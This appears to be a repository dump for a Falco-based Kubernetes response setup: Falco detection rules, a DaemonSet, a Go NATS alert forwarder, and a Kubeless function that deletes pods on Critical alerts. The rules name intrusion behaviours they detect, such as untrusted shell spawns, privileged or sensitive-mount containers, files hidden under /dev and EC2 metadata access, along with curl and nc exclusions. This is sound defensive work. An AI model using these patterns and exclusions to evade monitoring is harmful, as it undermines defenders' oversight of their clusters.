997 | - macro: parent_java_running_activemq 998 | condition: (proc.pname=java and proc.pcmdline contains activemq.jar) 999 | 1000 | - macro: parent_java_running_cassandra 1001 | condition: (proc.pname=java and (proc.pcmdline contains "-Dcassandra.config.loader" or proc.pcmdline contains org.apache.cassandra.service.CassandraDaemon)) 1002 | 1003 | - macro: parent_java_running_jboss_wildfly 1004 | condition: (proc.pname=java and proc.pcmdline contains org.jboss) 1005 | 1006 | - macro: parent_java_running_glassfish 1007 | condition: (proc.pname=java and proc.pcmdline contains com.sun.enterprise.glassfish) 1008 | 1009 | - macro: parent_java_running_hadoop 1010 | condition: (proc.pname=java and proc.pcmdline contains org.apache.hadoop) 1011 | 1012 | - macro: parent_java_running_datastax 1013 | condition: (proc.pname=java and proc.pcmdline contains com.datastax) 1014 | 1015 | - macro: nginx_starting_nginx 1016 | condition: (proc.pname=nginx and proc.cmdline contains "/usr/sbin/nginx -c /etc/nginx/nginx.conf") 1017 | 1018 | - macro: nginx_running_aws_s3_cp 1019 | condition: (proc.pname=nginx and proc.cmdline startswith "sh -c /usr/local/bin/aws s3 cp") 1020 | 1021 | - macro: consul_running_net_scripts 1022 | condition: (proc.pname=consul and (proc.cmdline startswith "sh -c curl" or proc.cmdline startswith "sh -c nc")) 1023 | 1024 | - macro: consul_running_alert_checks 1025 | condition: (proc.pname=consul and proc.cmdline startswith "sh -c /bin/consul-alerts") 1026 | 1027 | - macro: serf_script 1028 | condition: (proc.cmdline startswith "sh -c serf") 1029 | 1030 | - macro: check_process_status 1031 | condition: (proc.cmdline startswith "sh -c kill -0 ") 1032 | 1033 | # In some cases, you may want to consider node processes run directly 1034 | # in containers as protected shell spawners. Examples include using 1035 | # pm2-docker or pm2 start some-app.js --no-daemon-mode as the direct 1036 | # entrypoint of the container, and when the node app is a long-lived 1037 | # server using something like express. 1038 | # 1039 | # However, there are other uses of node related to build pipelines for 1040 | # which node is not really a server but instead a general scripting 1041 | # tool. In these cases, shells are very likely and in these cases you 1042 | # don't want to consider node processes protected shell spawners. 1043 | # 1044 | # We have to choose one of these cases, so we consider node processes 1045 | # as unprotected by default. If you want to consider any node process 1046 | # run in a container as a protected shell spawner, override the below 1047 | # macro to remove the "never_true" clause, which allows it to take effect. 1048 | - macro: possibly_node_in_container 1049 | condition: (never_true and (proc.pname=node and proc.aname[3]=docker-containe)) 1050 | 1051 | - macro: protected_shell_spawner 1052 | condition: > 1053 | (proc.aname in (protected_shell_spawning_binaries) 1054 | or parent_java_running_zookeeper 1055 | or parent_java_running_kafka 1056 | or parent_java_running_elasticsearch 1057 | or parent_java_running_activemq 1058 | or parent_java_running_cassandra 1059 | or parent_java_running_jboss_wildfly 1060 | or parent_java_running_glassfish 1061 | or parent_java_running_hadoop 1062 | or parent_java_running_datastax 1063 | or possibly_node_in_container) 1064 | 1065 | - list: mesos_shell_binaries 1066 | items: [mesos-docker-ex, mesos-slave, mesos-health-ch] 1067 | 1068 | # Note that runsv is both in protected_shell_spawner and the 1069 | # exclusions by pname. This means that runsv can itself spawn shells 1070 | # (the ./run and ./finish scripts), but the processes runsv can not 1071 | # spawn shells. 1072 | - rule: Run shell untrusted 1073 | desc: an attempt to spawn a shell below a non-shell application. Specific applications are monitored. 1074 | condition: > 1075 | spawned_process 1076 | and shell_procs 1077 | and proc.pname exists 1078 | and protected_shell_spawner 1079 | and not proc.pname in (shell_binaries, gitlab_binaries, cron_binaries, user_known_shell_spawn_binaries, 1080 | needrestart_binaries, 1081 | mesos_shell_binaries, 1082 | erl_child_setup, exechealthz, 1083 | PM2, PassengerWatchd, c_rehash, svlogd, logrotate, hhvm, serf, 1084 | lb-controller, nvidia-installe, runsv, statsite, erlexec) 1085 | and not proc.cmdline in (known_shell_spawn_cmdlines) 1086 | and not proc.aname in (unicorn_launche) 1087 | and not consul_running_net_scripts 1088 | and not consul_running_alert_checks 1089 | and not nginx_starting_nginx 1090 | and not nginx_running_aws_s3_cp 1091 | and not run_by_package_mgmt_binaries 1092 | and not serf_script 1093 | and not check_process_status 1094 | and not run_by_foreman 1095 | and not python_mesos_marathon_scripting 1096 | and not splunk_running_forwarder 1097 | and not postgres_running_wal_e 1098 | and not redis_running_prepost_scripts 1099 | and not rabbitmq_running_scripts 1100 | and not rabbitmqctl_running_scripts 1101 | and not user_shell_container_exclusions 1102 | output: > 1103 | Shell spawned by untrusted binary (user=%user.name shell=%proc.name parent=%proc.pname 1104 | cmdline=%proc.cmdline pcmdline=%proc.pcmdline gparent=%proc.aname[2] ggparent=%proc.aname[3] 1105 | gggparent=%proc.aname[4] ggggparent=%proc.aname[5]) 1106 | priority: DEBUG 1107 | tags: [shell] 1108 | 1109 | - macro: trusted_containers 1110 | condition: (container.image startswith sysdig/agent or 1111 | (container.image startswith sysdig/falco and 1112 | not container.image startswith sysdig/falco-event-generator) or 1113 | container.image startswith quay.io/sysdig or 1114 | container.image startswith sysdig/sysdig or 1115 | container.image startswith gcr.io/google_containers/hyperkube or 1116 | container.image startswith quay.io/coreos/flannel or 1117 | container.image startswith gcr.io/google_containers/kube-proxy or 1118 | container.image startswith calico/node or 1119 | container.image startswith rook/toolbox or 1120 | container.image startswith registry.access.redhat.com/openshift3/logging-fluentd or 1121 | container.image startswith registry.access.redhat.com/openshift3/logging-elasticsearch or 1122 | container.image startswith registry.access.redhat.com/openshift3/metrics-cassandra or 1123 | container.image startswith openshift3/ose-sti-builder or 1124 | container.image startswith registry.access.redhat.com/openshift3/ose-sti-builder or 1125 | container.image startswith cloudnativelabs/kube-router or 1126 | container.image startswith "consul:" or 1127 | container.image startswith mesosphere/mesos-slave or 1128 | container.image startswith istio/proxy_ or 1129 | container.image startswith datadog/docker-dd-agent) 1130 | 1131 | # Add conditions to this macro (probably in a separate file, 1132 | # overwriting this macro) to specify additional containers that are 1133 | # trusted and therefore allowed to run privileged. 1134 | # 1135 | # In this file, it just takes one of the images in trusted_containers 1136 | # and repeats it. 1137 | - macro: user_trusted_containers 1138 | condition: (container.image startswith sysdig/agent) 1139 | 1140 | # Add conditions to this macro (probably in a separate file, 1141 | # overwriting this macro) to specify additional containers that are 1142 | # allowed to perform sensitive mounts. 1143 | # 1144 | # In this file, it just takes one of the images in trusted_containers 1145 | # and repeats it. 1146 | - macro: user_sensitive_mount_containers 1147 | condition: (container.image startswith sysdig/agent) 1148 | 1149 | - rule: Launch Privileged Container 1150 | desc: Detect the initial process started in a privileged container. Exceptions are made for known trusted images. 1151 | condition: > 1152 | evt.type=execve and proc.vpid=1 and container 1153 | and container.privileged=true 1154 | and not trusted_containers 1155 | and not user_trusted_containers 1156 | output: Privileged container started (user=%user.name command=%proc.cmdline %container.info image=%container.image) 1157 | priority: INFO 1158 | tags: [container, cis] 1159 | 1160 | # For now, only considering a full mount of /etc as 1161 | # sensitive. Ideally, this would also consider all subdirectories 1162 | # below /etc as well, but the globbing mechanism used by sysdig 1163 | # doesn't allow exclusions of a full pattern, only single characters. 1164 | - macro: sensitive_mount 1165 | condition: (container.mount.dest[/proc*] != "N/A" or 1166 | container.mount.dest[/var/run/docker.sock] != "N/A" or 1167 | container.mount.dest[/] != "N/A" or 1168 | container.mount.dest[/etc] != "N/A" or 1169 | container.mount.dest[/root*] != "N/A") 1170 | 1171 | # The steps libcontainer performs to set up the root program for a container are: 1172 | # - clone + exec self to a program runc:[0:PARENT] 1173 | # - clone a program runc:[1:CHILD] which sets up all the namespaces 1174 | # - clone a second program runc:[2:INIT] + exec to the root program. 1175 | # The parent of runc:[2:INIT] is runc:0:PARENT] 1176 | # As soon as 1:CHILD is created, 0:PARENT exits, so there's a race 1177 | # where at the time 2:INIT execs the root program, 0:PARENT might have 1178 | # already exited, or might still be around. So we handle both. 1179 | # We also let runc:[1:CHILD] count as the parent process, which can occur 1180 | # when we lose events and lose track of state. 1181 | 1182 | - macro: container_entrypoint 1183 | condition: (not proc.pname exists or proc.pname in (runc:[0:PARENT], runc:[1:CHILD], docker-runc, exe)) 1184 | 1185 | - rule: Launch Sensitive Mount Container 1186 | desc: > 1187 | Detect the initial process started by a container that has a mount from a sensitive host directory 1188 | (i.e. /proc). Exceptions are made for known trusted images. 1189 | condition: > 1190 | evt.type=execve and proc.vpid=1 and container 1191 | and sensitive_mount 1192 | and not trusted_containers 1193 | and not user_sensitive_mount_containers 1194 | output: Container with sensitive mount started (user=%user.name command=%proc.cmdline %container.info image=%container.image mounts=%container.mounts) 1195 | priority: INFO 1196 | tags: [container, cis] 1197 | 1198 | # In a local/user rules file, you could override this macro to 1199 | # explicitly enumerate the container images that you want to run in 1200 | # your environment. In this main falco rules file, there isn't any way 1201 | # to know all the containers that can run, so any container is 1202 | # alllowed, by using a filter that is guaranteed to evaluate to true 1203 | # (the same proc.vpid=1 that's in the Launch Disallowed Container 1204 | # rule). In the overridden macro, the condition would look something 1205 | # like (container.image startswith vendor/container-1 or 1206 | # container.image startswith vendor/container-2 or ...) 1207 | 1208 | - macro: allowed_containers 1209 | condition: (proc.vpid=1) 1210 | 1211 | - rule: Launch Disallowed Container 1212 | desc: > 1213 | Detect the initial process started by a container that is not in a list of allowed containers. 1214 | condition: evt.type=execve and proc.vpid=1 and container and not allowed_containers 1215 | output: Container started and not in allowed list (user=%user.name command=%proc.cmdline %container.info image=%container.image) 1216 | priority: WARNING 1217 | tags: [container] 1218 | 1219 | # Anything run interactively by root 1220 | # - condition: evt.type != switch and user.name = root and proc.name != sshd and interactive 1221 | # output: "Interactive root (%user.name %proc.name %evt.dir %evt.type %evt.args %fd.name)" 1222 | # priority: WARNING 1223 | 1224 | - rule: System user interactive 1225 | desc: an attempt to run interactive commands by a system (i.e. non-login) user 1226 | condition: spawned_process and system_users and interactive 1227 | output: "System user ran an interactive command (user=%user.name command=%proc.cmdline)" 1228 | priority: INFO 1229 | tags: [users] 1230 | 1231 | - rule: Terminal shell in container 1232 | desc: A shell was used as the entrypoint/exec point into a container with an attached terminal. 1233 | condition: > 1234 | spawned_process and container 1235 | and shell_procs and proc.tty != 0 1236 | and container_entrypoint 1237 | output: > 1238 | A shell was spawned in a container with an attached terminal (user=%user.name %container.info 1239 | shell=%proc.name parent=%proc.pname cmdline=%proc.cmdline terminal=%proc.tty) 1240 | priority: NOTICE 1241 | tags: [container, shell] 1242 | 1243 | # For some container types (mesos), there isn't a container image to 1244 | # work with, and the container name is autogenerated, so there isn't 1245 | # any stable aspect of the software to work with. In this case, we 1246 | # fall back to allowing certain command lines. 1247 | 1248 | - list: known_shell_spawn_cmdlines 1249 | items: [ 1250 | '"sh -c uname -p 2> /dev/null"', 1251 | '"sh -c uname -s 2>&1"', 1252 | '"sh -c uname -r 2>&1"', 1253 | '"sh -c uname -v 2>&1"', 1254 | '"sh -c uname -a 2>&1"', 1255 | '"sh -c ruby -v 2>&1"', 1256 | '"sh -c getconf CLK_TCK"', 1257 | '"sh -c getconf PAGESIZE"', 1258 | '"sh -c LC_ALL=C LANG=C /sbin/ldconfig -p 2>/dev/null"', 1259 | '"sh -c LANG=C /sbin/ldconfig -p 2>/dev/null"', 1260 | '"sh -c /sbin/ldconfig -p 2>/dev/null"', 1261 | '"sh -c stty -a 2>/dev/null"', 1262 | '"sh -c stty -a < /dev/tty"', 1263 | '"sh -c stty -g < /dev/tty"', 1264 | '"sh -c node index.js"', 1265 | '"sh -c node index"', 1266 | '"sh -c node ./src/start.js"', 1267 | '"sh -c node app.js"', 1268 | '"sh -c node -e \"require(''nan'')\""', 1269 | '"sh -c node -e \"require(''nan'')\")"', 1270 | '"sh -c node $NODE_DEBUG_OPTION index.js "', 1271 | '"sh -c crontab -l 2"', 1272 | '"sh -c lsb_release -a"', 1273 | '"sh -c lsb_release -is 2>/dev/null"', 1274 | '"sh -c whoami"', 1275 | '"sh -c node_modules/.bin/bower-installer"', 1276 | '"sh -c /bin/hostname -f 2> /dev/null"', 1277 | '"sh -c locale -a"', 1278 | '"sh -c -t -i"', 1279 | '"sh -c openssl version"', 1280 | '"bash -c id -Gn kafadmin"', 1281 | '"sh -c /bin/sh -c ''date +%%s''"' 1282 | ] 1283 | 1284 | # This list allows for easy additions to the set of commands allowed 1285 | # to run shells in containers without having to without having to copy 1286 | # and override the entire run shell in container macro. Once 1287 | # https://github.com/draios/falco/issues/255 is fixed this will be a 1288 | # bit easier, as someone could append of any of the existing lists. 1289 | - list: user_known_shell_spawn_binaries 1290 | items: [] 1291 | 1292 | # This macro allows for easy additions to the set of commands allowed 1293 | # to run shells in containers without having to override the entire 1294 | # rule. Its default value is an expression that always is false, which 1295 | # becomes true when the "not ..." in the rule is applied. 1296 | - macro: user_shell_container_exclusions 1297 | condition: (never_true) 1298 | 1299 | - macro: login_doing_dns_lookup 1300 | condition: (proc.name=login and fd.l4proto=udp and fd.sport=53) 1301 | 1302 | # sockfamily ip is to exclude certain processes (like 'groups') that communicate on unix-domain sockets 1303 | # systemd can listen on ports to launch things like sshd on demand 1304 | - rule: System procs network activity 1305 | desc: any network activity performed by system binaries that are not expected to send or receive any network traffic 1306 | condition: > 1307 | (fd.sockfamily = ip and system_procs) 1308 | and (inbound or outbound) 1309 | and not proc.name in (systemd, hostid) 1310 | and not login_doing_dns_lookup 1311 | output: > 1312 | Known system binary sent/received network traffic 1313 | (user=%user.name command=%proc.cmdline connection=%fd.name) 1314 | priority: NOTICE 1315 | tags: [network] 1316 | 1317 | # With the current restriction on system calls handled by falco 1318 | # (e.g. excluding read/write/sendto/recvfrom/etc, this rule won't 1319 | # trigger). 1320 | # - rule: Ssh error in syslog 1321 | # desc: any ssh errors (failed logins, disconnects, ...) sent to syslog 1322 | # condition: syslog and ssh_error_message and evt.dir = < 1323 | # output: "sshd sent error message to syslog (error=%evt.buffer)" 1324 | # priority: WARNING 1325 | 1326 | - macro: somebody_becoming_themself 1327 | condition: ((user.name=nobody and evt.arg.uid=nobody) or 1328 | (user.name=www-data and evt.arg.uid=www-data) or 1329 | (user.name=_apt and evt.arg.uid=_apt) or 1330 | (user.name=postfix and evt.arg.uid=postfix) or 1331 | (user.name=pki-agent and evt.arg.uid=pki-agent) or 1332 | (user.name=pki-acme and evt.arg.uid=pki-acme) or 1333 | (user.name=nfsnobody and evt.arg.uid=nfsnobody) or 1334 | (user.name=postgres and evt.arg.uid=postgres)) 1335 | 1336 | - macro: nrpe_becoming_nagios 1337 | condition: (proc.name=nrpe and evt.arg.uid=nagios) 1338 | 1339 | # In containers, the user name might be for a uid that exists in the 1340 | # container but not on the host. (See 1341 | # https://github.com/draios/sysdig/issues/954). So in that case, allow 1342 | # a setuid. 1343 | - macro: known_user_in_container 1344 | condition: (container and user.name != "N/A") 1345 | 1346 | # sshd, mail programs attempt to setuid to root even when running as non-root. Excluding here to avoid meaningless FPs 1347 | - rule: Non sudo setuid 1348 | desc: > 1349 | an attempt to change users by calling setuid. sudo/su are excluded. users "root" and "nobody" 1350 | suing to itself are also excluded, as setuid calls typically involve dropping privileges. 1351 | condition: > 1352 | evt.type=setuid and evt.dir=> 1353 | and (known_user_in_container or not container) 1354 | and not user.name=root and not somebody_becoming_themself 1355 | and not proc.name in (known_setuid_binaries, userexec_binaries, mail_binaries, docker_binaries, 1356 | nomachine_binaries) 1357 | and not java_running_sdjagent 1358 | and not nrpe_becoming_nagios 1359 | output: > 1360 | Unexpected setuid call by non-sudo, non-root program (user=%user.name cur_uid=%user.uid parent=%proc.pname 1361 | command=%proc.cmdline uid=%evt.arg.uid) 1362 | priority: NOTICE 1363 | tags: [users] 1364 | 1365 | - rule: User mgmt binaries 1366 | desc: > 1367 | activity by any programs that can manage users, passwords, or permissions. sudo and su are excluded. 1368 | Activity in containers is also excluded--some containers create custom users on top 1369 | of a base linux distribution at startup. 1370 | Some innocuous commandlines that don't actually change anything are excluded. 1371 | condition: > 1372 | spawned_process and proc.name in (user_mgmt_binaries) and 1373 | not proc.name in (su, sudo, lastlog, nologin, unix_chkpwd) and not container and 1374 | not proc.pname in (cron_binaries, systemd, systemd.postins, udev.postinst, run-parts) and 1375 | not proc.cmdline startswith "passwd -S" and 1376 | not proc.cmdline startswith "useradd -D" and 1377 | not proc.cmdline startswith "systemd --version" and 1378 | not run_by_qualys and 1379 | not run_by_sumologic_securefiles and 1380 | not run_by_yum and 1381 | not run_by_ms_oms and 1382 | not run_by_google_accounts_daemon 1383 | output: > 1384 | User management binary command run outside of container 1385 | (user=%user.name command=%proc.cmdline parent=%proc.pname gparent=%proc.aname[2] ggparent=%proc.aname[3] gggparent=%proc.aname[4]) 1386 | priority: NOTICE 1387 | tags: [host, users] 1388 | 1389 | - list: allowed_dev_files 1390 | items: [ 1391 | /dev/null, /dev/stdin, /dev/stdout, /dev/stderr, 1392 | /dev/random, /dev/urandom, /dev/console, /dev/kmsg 1393 | ] 1394 | 1395 | # (we may need to add additional checks against false positives, see: 1396 | # https://bugs.launchpad.net/ubuntu/+source/rkhunter/+bug/86153) 1397 | - rule: Create files below dev 1398 | desc: creating any files below /dev other than known programs that manage devices. Some rootkits hide files in /dev. 1399 | condition: > 1400 | fd.directory = /dev and 1401 | (evt.type = creat or (evt.type = open and evt.arg.flags contains O_CREAT)) 1402 | and not proc.name in (dev_creation_binaries) 1403 | and not fd.name in (allowed_dev_files) 1404 | and not fd.name startswith /dev/tty 1405 | output: "File created below /dev by untrusted program (user=%user.name command=%proc.cmdline file=%fd.name)" 1406 | priority: ERROR 1407 | tags: [filesystem] 1408 | 1409 | 1410 | # In a local/user rules file, you could override this macro to 1411 | # explicitly enumerate the container images that you want to allow 1412 | # access to EC2 metadata. In this main falco rules file, there isn't 1413 | # any way to know all the containers that should have access, so any 1414 | # container is alllowed, by repeating the "container" macro. In the 1415 | # overridden macro, the condition would look something like 1416 | # (container.image startswith vendor/container-1 or container.image 1417 | # startswith vendor/container-2 or ...) 1418 | - macro: ec2_metadata_containers 1419 | condition: container 1420 | 1421 | # On EC2 instances, 169.254.169.254 is a special IP used to fetch 1422 | # metadata about the instance. It may be desirable to prevent access 1423 | # to this IP from containers. 1424 | - rule: Contact EC2 Instance Metadata Service From Container 1425 | desc: Detect attempts to contact the EC2 Instance Metadata Service from a container 1426 | condition: outbound and fd.sip="169.254.169.254" and container and not ec2_metadata_containers 1427 | output: Outbound connection to EC2 instance metadata service (command=%proc.cmdline connection=%fd.name %container.info image=%container.image) 1428 | priority: NOTICE 1429 | tags: [network, aws, container] 1430 | 1431 | # In a local/user rules file, you should override this macro with the 1432 | # IP address of your k8s api server. The IP 1.2.3.4 is a placeholder 1433 | # IP that is not likely to be seen in practice. 1434 | - macro: k8s_api_server 1435 | condition: (fd.sip="1.2.3.4" and fd.sport=8080) 1436 | 1437 | # In a local/user rules file, list the container images that are 1438 | # allowed to contact the K8s API Server from within a container. This 1439 | # might cover cases where the K8s infrastructure itself is running 1440 | # within a container. 1441 | - macro: k8s_containers 1442 | condition: > 1443 | (container.image startswith gcr.io/google_containers/hyperkube-amd64 or 1444 | container.image startswith gcr.io/google_containers/kube2sky or 1445 | container.image startswith sysdig/agent or 1446 | container.image startswith sysdig/falco or 1447 | container.image startswith sysdig/sysdig) 1448 | 1449 | - rule: Contact K8S API Server From Container 1450 | desc: Detect attempts to contact the K8S API Server from a container 1451 | condition: outbound and k8s_api_server and container and not k8s_containers 1452 | output: Unexpected connection to K8s API Server from container (command=%proc.cmdline %container.info image=%container.image connection=%fd.name) 1453 | priority: NOTICE 1454 | tags: [network, k8s, container] 1455 | 1456 | # In a local/user rules file, list the container images that are 1457 | # allowed to contact NodePort services from within a container. This 1458 | # might cover cases where the K8s infrastructure itself is running 1459 | # within a container. 1460 | # 1461 | # By default, all containers are allowed to contact NodePort services. 1462 | - macro: nodeport_containers 1463 | condition: container 1464 | 1465 | - rule: Unexpected K8s NodePort Connection 1466 | desc: Detect attempts to use K8s NodePorts from a container 1467 | condition: (outbound or inbound) and fd.sport >= 30000 and fd.sport <= 32767 and container and not nodeport_containers 1468 | output: Unexpected K8s NodePort Connection (command=%proc.cmdline connection=%fd.name) 1469 | priority: NOTICE 1470 | tags: [network, k8s, container] 1471 | 1472 | # Application rules have moved to application_rules.yaml. Please look 1473 | # there if you want to enable them by adding to 1474 | # falco_rules.local.yaml. 1475 | 1476 | -------------------------------------------------------------------------------- /falco-daemonset-configmap.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: extensions/v1beta1 2 | kind: DaemonSet 3 | metadata: 4 | name: falco 5 | labels: 6 | name: falco-daemonset 7 | app: demo 8 | spec: 9 | template: 10 | metadata: 11 | labels: 12 | name: falco 13 | app: demo 14 | role: security 15 | spec: 16 | serviceAccount: falco-account 17 | containers: 18 | - name: falco-nats 19 | image: sysdiglabs/falco-nats:latest 20 | imagePullPolicy: Always 21 | volumeMounts: 22 | - mountPath: /var/run/falco/ 23 | name: shared-pipe 24 | - name: falco 25 | image: sysdig/falco:latest 26 | securityContext: 27 | privileged: true 28 | args: [ "/usr/bin/falco", "-K", "/var/run/secrets/kubernetes.io/serviceaccount/token", "-k", "https://kubernetes", "-pk", "-U"] 29 | volumeMounts: 30 | - mountPath: /var/run/falco/ 31 | name: shared-pipe 32 | readOnly: false 33 | - mountPath: /host/var/run/docker.sock 34 | name: docker-socket 35 | readOnly: true 36 | - mountPath: /host/dev 37 | name: dev-fs 38 | readOnly: true 39 | - mountPath: /host/proc 40 | name: proc-fs 41 | readOnly: true 42 | - mountPath: /host/boot 43 | name: boot-fs 44 | readOnly: true 45 | - mountPath: /host/lib/modules 46 | name: lib-modules 47 | readOnly: true 48 | - mountPath: /host/usr 49 | name: usr-fs 50 | readOnly: true 51 | - mountPath: /etc/falco 52 | name: falco-config 53 | initContainers: 54 | - name: init-pipe 55 | image: busybox 56 | command: ['mkfifo','/var/run/falco/nats'] 57 | volumeMounts: 58 | - mountPath: /var/run/falco/ 59 | name: shared-pipe 60 | readOnly: false 61 | volumes: 62 | - name: shared-pipe 63 | emptyDir: {} 64 | - name: docker-socket 65 | hostPath: 66 | path: /var/run/docker.sock 67 | - name: dev-fs 68 | hostPath: 69 | path: /dev 70 | - name: proc-fs 71 | hostPath: 72 | path: /proc 73 | - name: boot-fs 74 | hostPath: 75 | path: /boot 76 | - name: lib-modules 77 | hostPath: 78 | path: /lib/modules 79 | - name: usr-fs 80 | hostPath: 81 | path: /usr 82 | - name: falco-config 83 | configMap: 84 | name: falco-config 85 | -------------------------------------------------------------------------------- /falco-nats/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM alpine:latest 2 | 3 | COPY ./nats-pub /bin/ 4 | 5 | CMD ["/bin/nats-pub"] 6 | -------------------------------------------------------------------------------- /falco-nats/Makefile: -------------------------------------------------------------------------------- 1 | DOCKER_ORG := sysdiglabs 2 | IMAGE := $(if $(HUB),$(HUB)/)$(DOCKER_ORG)/falco-nats 3 | 4 | 5 | all: linux image 6 | 7 | linux: 8 | # Compile statically linked binary for linux. 9 | GOOS=linux GOARCH=amd64 CGO_ENABLED=0 go build -ldflags="-s" -o nats-pub nats-pub.go 10 | 11 | image: 12 | docker build -t "$(IMAGE):latest" . 13 | 14 | push: 15 | docker push "$(IMAGE):latest" 16 | -------------------------------------------------------------------------------- /falco-nats/nats-pub: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sysdiglabs/falco-nats/3dbb2740d4878dbee64c0c03116ce37abbc6a075/falco-nats/nats-pub -------------------------------------------------------------------------------- /falco-nats/nats-pub.go: -------------------------------------------------------------------------------- 1 | // Copyright 2012-2018 The NATS Authors 2 | // Licensed under the Apache License, Version 2.0 (the "License"); 3 | // you may not use this file except in compliance with the License. 4 | // You may obtain a copy of the License at 5 | // 6 | // http://www.apache.org/licenses/LICENSE-2.0 7 | // 8 | // Unless required by applicable law or agreed to in writing, software 9 | // distributed under the License is distributed on an "AS IS" BASIS, 10 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 11 | // See the License for the specific language governing permissions and 12 | // limitations under the License. 13 | 14 | // +build ignore 15 | 16 | package main 17 | 18 | import ( 19 | "flag" 20 | "log" 21 | "os" 22 | "bufio" 23 | "github.com/nats-io/go-nats" 24 | ) 25 | 26 | 27 | func usage() { 28 | log.Fatalf("Usage: nats-pub [-s server (%s)] \n", nats.DefaultURL) 29 | } 30 | 31 | 32 | func main() { 33 | var urls = flag.String("s", "nats://nats.nats-io.svc.cluster.local:4222", "The nats server URLs (separated by comma)") 34 | var pipePath = flag.String("f", "/var/run/falco/nats", "The named pipe path") 35 | var subj = "FALCO" 36 | 37 | log.SetFlags(0) 38 | flag.Usage = usage 39 | flag.Parse() 40 | 41 | 42 | nc, err := nats.Connect(*urls) 43 | if err != nil { 44 | log.Fatal(err) 45 | } 46 | defer nc.Close() 47 | 48 | pipe, err := os.OpenFile(*pipePath, os.O_RDONLY, 0600) 49 | if err != nil { 50 | log.Fatal(err) 51 | } 52 | 53 | log.Printf("Opened pipe %s", *pipePath) 54 | 55 | reader := bufio.NewReader(pipe) 56 | scanner := bufio.NewScanner(reader) 57 | 58 | log.Printf("Scanning %s", *pipePath) 59 | 60 | for scanner.Scan() { 61 | msg := []byte(scanner.Text()) 62 | 63 | nc.Publish(subj, msg) 64 | nc.Flush() 65 | 66 | if err := nc.LastError(); err != nil { 67 | log.Fatal(err) 68 | } else { 69 | log.Printf("Published [%s] : '%s'\n", subj, msg) 70 | } 71 | } 72 | 73 | } 74 | -------------------------------------------------------------------------------- /kubeless-function/README.md: -------------------------------------------------------------------------------- 1 | # Kubeless Function to Delete Kubernetes Pod 2 | 3 | This Kubeless function will delete a pod when a Falco alert is recieved from the NATS server topic `FALCO`. The Pod will only be deleted if the Falco alert is of `Critical` priority. Follow the [quick start instructions](http://kubeless.io/docs/quick-start/) on the Kubeless site to deploy Kubeless. 4 | 5 | Deploy the function as below. 6 | 7 | ``` 8 | kubeless function deploy --from-file delete-pod.py --dependencies requirements.txt --runtime python2.7 --handler delete-pod.delete_pod falco-pod-delete 9 | INFO[0000] Deploying function... 10 | INFO[0000] Function falco-pod-delete submitted for deployment 11 | INFO[0000] Check the deployment status executing 'kubeless function ls falco-pod-delete' 12 | ``` 13 | 14 | Follow the instructions in the Kubeless quick start to create a NATS trigger controller and a trigger for our delete pod function. 15 | 16 | ``` 17 | $ kubectl create -f https://github.com/kubeless/kubeless/releases/download/$RELEASE/nats-$RELEASE.yaml 18 | customresourcedefinition "natstriggers.kubeless.io" created 19 | deployment "nats-trigger-controller" created 20 | clusterrole "nats-controller-deployer" created 21 | clusterrolebinding "nats-controller-deployer" created 22 | 23 | $ kubeless trigger nats create falco-delete-pod-trigger --function-selector created-by=kubeless,function=falco-pod-delete --trigger-topic FALCO 24 | INFO[0000] NATS trigger falco-delete-pod-trigger created in namespace default successfully! 25 | 26 | ``` 27 | 28 | WARNING: 29 | 30 | For the function to work you need to change the default service account used by kubeless. 31 | 32 | First create a service account with the proper privileges: 33 | 34 | ``` 35 | kubectl create -f falco-pod-delete-account.yaml 36 | ``` 37 | 38 | 39 | Kubeless doesn't support specifying a `serviceAccountName` for a deployed function. As a workaround, edit the kubeless deployment to specific a `serviceAccountName` in the deployment object: 40 | 41 | ``` 42 | $ kubectl edit deployment falco-pod-delete 43 | securityContext: 44 | fsGroup: 1000 45 | runAsUser: 1000 46 | + serviceAccountName: falco-pod-delete 47 | terminationGracePeriodSeconds: 30 48 | volumes: 49 | 50 | ``` 51 | 52 | Kubernetes should start a new Pod running with the new `serviceAccount`. Else delete the pod associated with the kubeless deployment. 53 | 54 | ``` 55 | $ kubectl delete pod falco-pod-delete- 56 | ``` 57 | 58 | Confirm the new service account on the new Pod. 59 | ``` 60 | $ kubectl get pod falco-pod-delete- -o yaml |grep serviceAccount 61 | serviceAccount: falco-pod-delete 62 | serviceAccountName: falco-pod-delete 63 | ``` 64 | 65 | When a Pod is deleted, the action is logged to the `stdout` of the `falco-pod-delete` Pod. -------------------------------------------------------------------------------- /kubeless-function/delete-pod.py: -------------------------------------------------------------------------------- 1 | from kubernetes import client,config 2 | 3 | # To run this locally, load your local kubeconfig with 4 | #config.load_kube_config() 5 | 6 | # Inside a cluster load the service account default kubeconfig with 7 | config.load_incluster_config() 8 | 9 | v1=client.CoreV1Api() 10 | 11 | body = client.V1DeleteOptions() 12 | 13 | 14 | def find_pod_ns(podname=None): 15 | ns=None 16 | response=v1.list_pod_for_all_namespaces(watch=False) 17 | for i in response.items: 18 | if i.metadata.name == podname: 19 | print 'Found Pod NS: {}\tPOD: {}'.format(i.metadata.namespace, i.metadata.name) 20 | ns=i.metadata.namespace 21 | break 22 | 23 | return ns 24 | 25 | def delete_pod(event, context): 26 | priority = event['data']['priority'] or None 27 | output_fields = event['data']['output_fields'] or None 28 | 29 | if priority and priority == "Critical" and output_fields and output_fields['container.id'] != "host": 30 | name = output_fields['k8s.pod.name'] 31 | print 'Critcal Falco alert for pod: {} '.format(name) 32 | 33 | ns=find_pod_ns(name) 34 | print 'Deleting POD {} in NameSpace {}'.format(name, ns) 35 | v1.delete_namespaced_pod(name=name, namespace=ns, body=body) -------------------------------------------------------------------------------- /kubeless-function/falco-pod-delete-account.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: ServiceAccount 3 | metadata: 4 | name: falco-pod-delete 5 | --- 6 | kind: ClusterRole 7 | apiVersion: rbac.authorization.k8s.io/v1beta1 8 | metadata: 9 | name: falco-pod-delete-cluster-role 10 | rules: 11 | - apiGroups: ["extensions",""] 12 | resources: ["pods"] 13 | verbs: ["get","list","delete"] 14 | --- 15 | kind: ClusterRoleBinding 16 | apiVersion: rbac.authorization.k8s.io/v1beta1 17 | metadata: 18 | name: falco-pod-delete-cluster-role-binding 19 | namespace: default 20 | subjects: 21 | - kind: ServiceAccount 22 | name: falco-pod-delete 23 | namespace: default 24 | roleRef: 25 | kind: ClusterRole 26 | 